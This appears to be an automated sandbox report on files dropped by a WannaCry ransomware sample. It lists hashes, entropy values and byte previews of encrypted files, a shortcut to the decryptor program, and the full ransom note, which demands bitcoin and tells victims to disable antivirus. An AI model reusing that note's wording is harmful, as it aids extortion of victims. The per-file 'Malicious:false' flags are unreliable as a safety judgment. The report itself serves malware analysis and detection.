                                                                                      Preview:WANACRY!........4.a-....`v..7....;.9......2.YIy..*..OO.J.*3b'.L......;..2s..:.98...3R..^I..xy.A......%..........~^...X.[..!.."..."...9.j.y.F..C.M|F]M......^....R._...nO&...D.1..v/...}W..O..q.W.tK..)y..#)....3Igg.T.i2.......^(.1..b"...WC%..=.}.>...z..;<o............G.<.C.[h.Ohd...*&-..n.4..K..5.l.Q#..|Q.B...0.._....!..8...e....1.\../..\.Z..tY`a..Th.H3....H...(..;..3.O.....]s.....L...7.6/Jpv>.`..o....).....M:.x#.p..Y<..K.....L,2.......1._.}(.d......;.-c9.,?X.k{1....H....1.<..=us...h...D.|.xr...a1.A.........1.....}uU..Ic.q.\3...\!..9...H.%.YF.."......;e...6.[?...o..i..j....=iY(<..V.R..2.V._j...w....P..2m.JU...T..D..%b&/..8.[...;L....<..<~..E.............g......G..\..p....*...}R.7..Nr}y..#...>....z?.....A...f....Q,..88..GN.7y...$.d.i.d.?y..l...C/db....|>.Ky:V....Z.].......W.."I.u.....x..w...a'.....i...4...XL.UW.-.c@ib...C%...=.t.<<.Vr+1c...*............&..d..}.Ej..j.3..{.."P..."......].].i.m!4.D..n.../..<*.....o....]3.F.SD..b..|W+....l..\sk..s
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.834498446594247
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:9/HcpZDDTR4rB16/O690HcSTU/aLuMICTOu/TPv0mE:mDIzsO6e8oQaKQlTDE
                                                                                      MD5:56CC2751090A40E062BDEFAA94708C1C
                                                                                      SHA1:6CF958D8AAC2E66569CFA8B26D081982A20D2E32
                                                                                      SHA-256:07BF7E7EF74E35C60E14EA18296CF799F183532ECB375956F04FA10718ED3724
                                                                                      SHA-512:189BB6FE5F3F85D97B14D99B8C3D95969C97C45BBA6C064BAD178C94F7767EEE4DDF134AD0D7ED01BC8A134B7B2E8F311D7AAA3DACF322C30F48C55D7C1323DF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..._. ie..p.}.r..b8.S.."........0....Q..r.........uZ.b.3...[..A.Zr=.<...9[...f......l...Q.^n..0o[.o...h#...v$..(..K.... .%Ne..J...k...<*./..*../..5;..\....y~..|.e..O.Yjk..q^:..R4...8.V.pB}Q<5.9.....?.u..Tl..^.r.#..7...,....]v[.."L.T.Q...+\...;..@.%l.8{.+....(..iV.x....-Wq.7K,y.....,.....?&......}T....b!T2Q3?|.a.....bh.a3.5.....j".!8n..E/..c..C.........kU..8( E.S8+..M.0..#..~P\m...g.K.....@..i@....@.g....B.F"u....6j...9<.O*.......2U..w..(YG.c.{)..#_s....&.a.}.Z.z.h....R.:.'..,I.t..l.w}.l..&..,... Y.w.a.{[..H...C....(...2..0.)..5.M$..Vh..`.BQirQ..<k..._.=....MN....D.f...........Vw..JU.+4.-`..G.{...2..X....!>.%v+....].f.koC...........b....k...5.?.w3.~.q...X\.[.:..J..l..Y...1.?....%.....:[.4.p.S$m...PF4IO.DP....B.C.@m..Y..A...N.#..y...q..?9.qY..{...':O...oF.9.Kq...g.....S..K...~ @..:.WC.-..s.o....W/w.C16..:7..E.a.K..{8..._.|.iW.....cF:.c..Lz.]..R..)...@p..TIu.z.!(^..n.W....V.wH.Y....x...)2{...a.S~......-..t&.#.S...@...3.M...B.!...A...6..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.837951615295904
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkQ9ptNkecWUbWk4Z04xTq17Gr7Tq8nEsoSL0pbjNDJ8DHjwHFV8FYGhrx:bkQ99UiZrxWUy8nMSIpNDGDHjw4YG/
                                                                                      MD5:3AE047064B2FA0EEAC52DF6C586CB1B5
                                                                                      SHA1:E4D3E3F6E97A2BFEB275F1D9A6B96C8CC0EF3817
                                                                                      SHA-256:46B989E3754B2C0EB08FAECF2ED42097368EFA3A39C837A20D835D27EBD73E88
                                                                                      SHA-512:1AF0F81FE284376B2DA62EB425DA2633FE34D971D257AC38913B98027B007A852A757A5E4A6C6AF2809F3FC33E57DB5739AB6FCCB8FD66C5A4BA4320AFD8161A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......5)L.u.qp..y....rdG.!..AJ.k...7;...u...,%..+..N.[..e'.|...p..M..p...X.2..-..P..5..l.${|I.......C..Dt.#^..h...\......T&../.CX.CZ.".3!R.G....R....W...y.G.G..}.../..#X.....?.....^.H...sn.H.`#E...R...Q.y..?r.......s.h.U..o.g.s....M.ZX9.B............s7.b....VGZ.."DA.j..Y!...Q9.&R..6..K.......V..;.....:..jN.;.{.RK0.....s.T. ..R._.F}.\......61.W}.gF..........XN..P....Mc..<...` .f.>UVq...5......"/..q...>>q....tW...x.\zn...B........6.C..8.J.o.4D|.x....bpvf9P.A."=.......]h_.mzQ%(.c\C..=.~.PM.ii..s.-...#Z."yIG6T.^/.Q.D8...O.<Mi........Z./..M...p.8...._..<..?d^........-... ......5......84..}.......0....<.Qc|.5...h...k.f..'4.9RVj.Y..r.'...EI.f.)..........H........0F...... .8.[...).G0&.6..2`........3.H.ludT%..^....6...,..]....!c..bl..@.A.~...;...K..)..eQ.)4...&(].F0.....5.9(.....Q.z.....cH..Y>.{.|......1l..V..6...b..LZ..y...#.H.BT.T.)._|,J'..H.*Z....|.7./...m_0.P..d*?./A.%..0Q7...Wp@dH.w.P1..s.3.b[.,].S..^.N<.9...o......W..b.f\.A.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.837951615295904
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkQ9ptNkecWUbWk4Z04xTq17Gr7Tq8nEsoSL0pbjNDJ8DHjwHFV8FYGhrx:bkQ99UiZrxWUy8nMSIpNDGDHjw4YG/
                                                                                      MD5:3AE047064B2FA0EEAC52DF6C586CB1B5
                                                                                      SHA1:E4D3E3F6E97A2BFEB275F1D9A6B96C8CC0EF3817
                                                                                      SHA-256:46B989E3754B2C0EB08FAECF2ED42097368EFA3A39C837A20D835D27EBD73E88
                                                                                      SHA-512:1AF0F81FE284376B2DA62EB425DA2633FE34D971D257AC38913B98027B007A852A757A5E4A6C6AF2809F3FC33E57DB5739AB6FCCB8FD66C5A4BA4320AFD8161A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......5)L.u.qp..y....rdG.!..AJ.k...7;...u...,%..+..N.[..e'.|...p..M..p...X.2..-..P..5..l.${|I.......C..Dt.#^..h...\......T&../.CX.CZ.".3!R.G....R....W...y.G.G..}.../..#X.....?.....^.H...sn.H.`#E...R...Q.y..?r.......s.h.U..o.g.s....M.ZX9.B............s7.b....VGZ.."DA.j..Y!...Q9.&R..6..K.......V..;.....:..jN.;.{.RK0.....s.T. ..R._.F}.\......61.W}.gF..........XN..P....Mc..<...` .f.>UVq...5......"/..q...>>q....tW...x.\zn...B........6.C..8.J.o.4D|.x....bpvf9P.A."=.......]h_.mzQ%(.c\C..=.~.PM.ii..s.-...#Z."yIG6T.^/.Q.D8...O.<Mi........Z./..M...p.8...._..<..?d^........-... ......5......84..}.......0....<.Qc|.5...h...k.f..'4.9RVj.Y..r.'...EI.f.)..........H........0F...... .8.[...).G0&.6..2`........3.H.ludT%..^....6...,..]....!c..bl..@.A.~...;...K..)..eQ.)4...&(].F0.....5.9(.....Q.z.....cH..Y>.{.|......1l..V..6...b..LZ..y...#.H.BT.T.)._|,J'..H.*Z....|.7./...m_0.P..d*?./A.%..0Q7...Wp@dH.w.P1..s.3.b[.,].S..^.N<.9...o......W..b.f\.A.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.813455010631493
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:74fv/u2ZnApCgX3fiDd/iIJ1ef2jv7boPTHZr8Ynf7qan:8fvW2uCevadKIzef2jv70bqYDbn
                                                                                      MD5:A1BDA59EA929E10BD5BF49095B434031
                                                                                      SHA1:6AFD3FAC30F4D3F44277525A4E071654F97F1767
                                                                                      SHA-256:E71B35D475BE8895570694678BBCA276BF0402E627D9551381AC72EE87C82E24
                                                                                      SHA-512:A9A824DA3A1E428C38169B16B492B074FDC70433C62309F66769D9ABE05C0484F86839C3884D68A76592F9E22E567FF70C7D54B6599661D77D1DAB385E249785
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..rz...r.6....!..,...[/x].h.....:?.N?.k&...c....'A.c...&..8^.{.....C.e.....>...(.N...V[.l9.6.....&:.a.".u..9.v.tph..>}8...WpZm.N.%...........SF.......\b....)P".....g.t.]l.@G.~k..h.......YK..f.._i..*<'.o..P...Q..Q..6i............P..#R*.....2...?..>k...PN...QG..I.H..^^Y$....m--..[......a...p..AsS.9K.a.)..x...{:hOTS.......O...*R..vi...&kD...H.Ka...0.6.U.....6\..!.{...I......1.2.xM*@....V..c.U.'>.a;c+.=\.U.......s..._YM@g|.I....Ac.a&..j.V%Z...]*.F@ig.."....TH)...'..'[.:. >....-.)c.*..7.]...Ml.*...\./.h..O....K.&E._..ii..3<.RA..J.!....L..>.l.6...G....~T.Elue...,.(ih.4..j.:.:1g...w....OA..Wg<....L/.|g.........l.....)..?d.fZ..S...uK%Tj.8.n.erV`..WB..?..U......$..D...-.V..LU......6.[..Gl..l...)...F.cl..F...{kV.C.s.`<...F...,a+...+.^..:a.P8.Z..s....QW<8...|.V....7..//.n..GP=Zh,..C...-...Ci.Vc.....}-..A<i.(..pU....>PZo...d}..)..@..bc..R......-d.>...DA....L.T..^...c..u.#;...dW.F..H..E....{....4).H.Q.!........2....Y=.q.yA.W.0\T.......9K...<.^A.~D.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.834102891461465
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk375Lkqw1x9kaHdw3/3GN6r5C6UDlRFrcWih72Btm+Z6gza+7cgSH+FFbV1dxpv:bklA7xL94h5olTQWihKttYAFYPMbTxpJ
                                                                                      MD5:D995B6B7FACD9FDFEEDABB395BC3B295
                                                                                      SHA1:2782378229DD4A98A8123388EF4D1EFDCEDC6716
                                                                                      SHA-256:AE9DFCEA4C637F7870BE33DDFB1D2B718B307D8C2326A7511C763D8C9434FACA
                                                                                      SHA-512:E572BCA1BF75B700BD4B2BF954C7BEB2B4F6E565D4643A87224C20120FA588F1FEC7FC037ADBA7AC842583F12F0201B739626E692609C6D2110C23301DEDD22C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t..z.dO.(....YH..?.Z.?"y.i.EU......_.z..T.....{...`..{...*SDk|7..o...a..l.H....}.b@w=4_..=.....%...!......Q..*,...)`.....r.?z.=r ]. .....'$,....^.p..2;..K..._..6..f.xWj..O.s........"....2tY..\....R........w...<....F.Z6.....`=L'.|..I.fB..{................Dt<...F....E...:kO..b.!)...r..3......`_PR... ....\......T..:.h.xa.}.h.K;@...T...V...E.{w.;C.fZ...Z..mc.N*...3...l.@.:.=~-..Q......@..+'..f..e.jh-..W~..AL.D....cy..f......Y.-.[...t...\^.._@...r......' ...w%f.q... ..]....g.E.B..I..V!.b.....~...u...-.7.]8....9T16.....12..V.8...m.9..g.t....h..d....).^.z 8.p...e\Q.Y+6.JO..E...3..7.L'/o1..~Zru.s}.|.<.6.."....4.r..r0....w.S......i.W...M.m.....n..............";.e...\..K!.R..?...}h.....E..[._.<.o0..x_.q..sa.........c4.tb...5..... ..x.q-...=.?{>....(6.\..:.....Pkcm.....7..;^.Y...|.Wt.....U..."U.e;.3.........8Z......._].~.5....c.....h.8|.P.Q...%.-.o.F..i..V.....}.\...........j.d.;....p.R..,-..W$?.b...s.R......{..m.S!...S...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.834102891461465
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk375Lkqw1x9kaHdw3/3GN6r5C6UDlRFrcWih72Btm+Z6gza+7cgSH+FFbV1dxpv:bklA7xL94h5olTQWihKttYAFYPMbTxpJ
                                                                                      MD5:D995B6B7FACD9FDFEEDABB395BC3B295
                                                                                      SHA1:2782378229DD4A98A8123388EF4D1EFDCEDC6716
                                                                                      SHA-256:AE9DFCEA4C637F7870BE33DDFB1D2B718B307D8C2326A7511C763D8C9434FACA
                                                                                      SHA-512:E572BCA1BF75B700BD4B2BF954C7BEB2B4F6E565D4643A87224C20120FA588F1FEC7FC037ADBA7AC842583F12F0201B739626E692609C6D2110C23301DEDD22C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t..z.dO.(....YH..?.Z.?"y.i.EU......_.z..T.....{...`..{...*SDk|7..o...a..l.H....}.b@w=4_..=.....%...!......Q..*,...)`.....r.?z.=r ]. .....'$,....^.p..2;..K..._..6..f.xWj..O.s........"....2tY..\....R........w...<....F.Z6.....`=L'.|..I.fB..{................Dt<...F....E...:kO..b.!)...r..3......`_PR... ....\......T..:.h.xa.}.h.K;@...T...V...E.{w.;C.fZ...Z..mc.N*...3...l.@.:.=~-..Q......@..+'..f..e.jh-..W~..AL.D....cy..f......Y.-.[...t...\^.._@...r......' ...w%f.q... ..]....g.E.B..I..V!.b.....~...u...-.7.]8....9T16.....12..V.8...m.9..g.t....h..d....).^.z 8.p...e\Q.Y+6.JO..E...3..7.L'/o1..~Zru.s}.|.<.6.."....4.r..r0....w.S......i.W...M.m.....n..............";.e...\..K!.R..?...}h.....E..[._.<.o0..x_.q..sa.........c4.tb...5..... ..x.q-...=.?{>....(6.\..:.....Pkcm.....7..;^.Y...|.Wt.....U..."U.e;.3.........8Z......._].~.5....c.....h.8|.P.Q...%.-.o.F..i..V.....}.\...........j.d.;....p.R..,-..W$?.b...s.R......{..m.S!...S...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.788151929938609
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:afqOX88Y1PvfqTVNQo9BsRz1udRO+3cbEGo2uqGl8:MXwUfvBG1uvqYwua
                                                                                      MD5:4CF8BDC8FDEABB1BDA352A80088E92D9
                                                                                      SHA1:B8EE9DDD085E51CE6BE9CD272DE25A1EA42E91CA
                                                                                      SHA-256:06D1F39BBB1A067A8DDA3EEF6636B06CBED0622FC7AA370A2B2C869B3FAE5F51
                                                                                      SHA-512:60C0C73D1BA104CF2BAF4B853FBA7DA4EA30CF1B3D030D59CFB1F298768A7FB8ADFA8CAE74F164AC1CF8DF67EDECE16ACA515AC81591BEDA32A88A125E80B6B7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...y...*..g..4..<..":.......T.K.sD_^.sO.....iD..L+..-........H....m.Tg.. ...a..p..j.....J....&.}.&.......>%|...L#...d...q..?..9'....,o<.q....k.._.g.....$........."k.b9....k..!...R[5.[./...IS..RE.w'E.75./....M:....?..rQ. @.C.......0IF..X..s%<.&E........dWT.=..F..4p...3.....o....^6...g..wG..e3.h.g.l.....^...`0..h5....R_:A.V5.J.}...:. jb...Zc...w.D.SN...>....gX.....?.d.6.<;.#v..PL.Z.....S,l........p..;...`a...S.(..k7B.|..Cz..'......._..=89...F.#J..G!..........d_....o9..Z!...{.k..._.K..........?..).l..._&...P*..LW..._E~xVOZ...W........@ .".uaP..c.2.x....D.4...c.R.g/,.Ik.L.F ak..P..m..i>.n..Z.q...]...../.....'.l..T|<./..&........[_.P%._.7/`.9+.>..+.|lNt'h....F.N]........B.Nr.........P....F).;Z.9].>K43#....M.............."..u.C.z...N..%!...i..........2.W.....yv6...r...K)...\..g..x@.z.....#......`..p26*.c..).6<..i.M#.%....].k.N...........!oh.:.W....4...S.0.Q...nMH...^I..i...U......\.ict.qs.6.&........d...d....@...(.........V%q.../_...&...jA..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858428393857922
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYP9A/mgxOV/GteNXnSCWE3E8fKFr99JyyHB+Knv36eL4xuNlSiXDpHJ1mDv5:bkYlUAV/+c3SCMVr9fyA+Kv36m5SiXV4
                                                                                      MD5:8D1BF50E05A2BA900F032FA5D759FD2B
                                                                                      SHA1:BAA39520FC0FA3C2CA2FB7BA032AF7FAC4BEFE1B
                                                                                      SHA-256:58A17DA230C6867B93BFACCC36C9A79D9FDE3217071DFE41C3515D307AE17A8B
                                                                                      SHA-512:C08EBD7E07CEE829F3A5043DB0CAC3C1066048E61AA6A82D6BEC71C7867D795C1089E67C2BF6B0AD92147E07838D5A6FB47E4F083B43C1FB83646F46A6B71A87
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....N........v&.....1..)X..|.-.[.T.nJ.<.)....1.1...;Y......_....$k../F.u...E... .I_........DB......).........P.G...9.Sy..q.....c.Z.+..e....,...Ou.z.....{.O...AK7...a...\..>7|.....n&..h.p.X..!.+2.....h(...s../..l..@.D'.....h....7.,..*.......Ry*.^..............|-v...u.......a.=.C.}.&.,vo6.<........k.w....=.m......._.P\c...]G..(...Y.~j.....[.PX...:?........M.....j...]].H f.7v...$.f...o..~6..N#...TV....p.73....<}...B..JX.....G..0......i.+;.'..H...3...o0.o.m......j.9.{%..&>j.L....{...~..... .qgW.....F.).97K,z...2..o&...5.p...`.4PG...[...............t,....C.e...7.J......v[...0J.Y.=.>\..x.......M...7T.0....rE%...+V+!.?f...>..$.j..(....../..D.....bZ......`.G...}.0.0M'S..l.&}.'..\........\g..d.F.n.|..>.........}.zd$........=N#xI...]._.+...>.Ug..mI.O!{..3.A...[..A....j...H.Sa_...N).n-.>C....O/...."3.C......'.'......u.Y,...h3..=..p.......!"...C...z....^'...I.UC.{.6.u...~W.qU..V...X b_fW{.;{R`,R.Z...!.....w.....eg....{R....w..G./.;...0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.858428393857922
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkYP9A/mgxOV/GteNXnSCWE3E8fKFr99JyyHB+Knv36eL4xuNlSiXDpHJ1mDv5:bkYlUAV/+c3SCMVr9fyA+Kv36m5SiXV4
                                                                                      MD5:8D1BF50E05A2BA900F032FA5D759FD2B
                                                                                      SHA1:BAA39520FC0FA3C2CA2FB7BA032AF7FAC4BEFE1B
                                                                                      SHA-256:58A17DA230C6867B93BFACCC36C9A79D9FDE3217071DFE41C3515D307AE17A8B
                                                                                      SHA-512:C08EBD7E07CEE829F3A5043DB0CAC3C1066048E61AA6A82D6BEC71C7867D795C1089E67C2BF6B0AD92147E07838D5A6FB47E4F083B43C1FB83646F46A6B71A87
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....N........v&.....1..)X..|.-.[.T.nJ.<.)....1.1...;Y......_....$k../F.u...E... .I_........DB......).........P.G...9.Sy..q.....c.Z.+..e....,...Ou.z.....{.O...AK7...a...\..>7|.....n&..h.p.X..!.+2.....h(...s../..l..@.D'.....h....7.,..*.......Ry*.^..............|-v...u.......a.=.C.}.&.,vo6.<........k.w....=.m......._.P\c...]G..(...Y.~j.....[.PX...:?........M.....j...]].H f.7v...$.f...o..~6..N#...TV....p.73....<}...B..JX.....G..0......i.+;.'..H...3...o0.o.m......j.9.{%..&>j.L....{...~..... .qgW.....F.).97K,z...2..o&...5.p...`.4PG...[...............t,....C.e...7.J......v[...0J.Y.=.>\..x.......M...7T.0....rE%...+V+!.?f...>..$.j..(....../..D.....bZ......`.G...}.0.0M'S..l.&}.'..\........\g..d.F.n.|..>.........}.zd$........=N#xI...]._.+...>.Ug..mI.O!{..3.A...[..A....j...H.Sa_...N).n-.>C....O/...."3.C......'.'......u.Y,...h3..=..p.......!"...C...z....^'...I.UC.{.6.u...~W.qU..V...X b_fW{.;{R`,R.Z...!.....w.....eg....{R....w..G./.;...0
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.799058261106798
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ArGSJmCTDFFN/kJw4pc7rF8+GUmtHWpOBwgTtg:A6uTJ7D4WP2P1WpOVtg
                                                                                      MD5:D2FEF7D96D48941C91997BC1A4F73A07
                                                                                      SHA1:6B73B8257F4B07FAA41C32704F6D11369F56ABCD
                                                                                      SHA-256:4E53C18F097747B374A16B10E4FA18B4DBB623B74B6F7DA437CF70A310465C47
                                                                                      SHA-512:060D76FDBEEF2102A7F29E9B895D553B2E3C747F3527DD3644356C193C377D5D2CCF144D39263B9F3876AB7AEE45EA75445D1C5C5E9CEB80165BB6861C45280F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..I..~3.\....S...._#,.rzG.2t.`...[t.X...X.;..Eo;.*..T.,*. w..".BF....:......\.....lPT~yG.?..`F..=.eY.....Jl9..i....9........l.a....W.Vb.e"t...u.._....^.`\.....C..y.e.....i...FrHg..].e.f9......Ra)..fl.......eX..h3r.-.>.....?(s.}He...k.)B.a...S.in.&b.ba!..v./...9N.k..d^..*...I.JxM.5[O.B.:y.#../HW.j..........?&n.4.......N7.b7..$.f.....@...f..).t...K..............."az...R...z..@......UP.8E..@..sc..........0....-Q{kN..a.isH..k.X.....<......U.V.UB{..9z..4{.F..BQFF+V.`....J.0.....f..W..<p.@o..]..S..VoU..QI......6..Ya>xSr.o ..F...b8..T...S..].b...<.$.....k.}...3.K...B#.c.2k......&...*..,.2..,'... ..o.....UlSm.i!"..6..........k.s5...7..H2K.'."E.K.9.._..d...6.>......d..~.>q......t.`Q.,J.s.6v....[.....s...m...,(.......2....*$.=0D..........d..2..p.....:n.w.@\V..p..j.9...]...4,z}6P...rN.l....a.,NG.W[...?.v...9....9..W.!.iV02....i.?...v....71...!9..z.^jU...0C`.....W.......k.T.z.].o.5.H..{..}}^.X'O.K..t...b?_...P....WB.-.*.....m.d.....bzvQ.g..v.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861747732131273
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkGq0/M9UzN9Y1EXprknmSlgvSgFsau1jPxejBMgx2nBTxeZURvAU4k3A:bkrX9ON9JXprkmSlgvVfmxdX9Q
                                                                                      MD5:186AAFC0A8CC90BF51C1169DADC3C5E2
                                                                                      SHA1:D02C78A951D4A6CA0B9510D4144E8A1AEA33CE25
                                                                                      SHA-256:8B7BBB93E4E9D04398D5A1255F1B250F9CE0879F86EA0289E9D12AD465C297FC
                                                                                      SHA-512:D41B922D8FF85EC7B70DB1652430BDE3D0E4BCB5877A36D0BF223C34EAD4DC74710C2A873659BDCDE3B12F2FF8928CEAACE8E97D09D4B68BAA3F83C833DF0F07
                                                                                      Malicious:false
                                                                                      Reputation:low
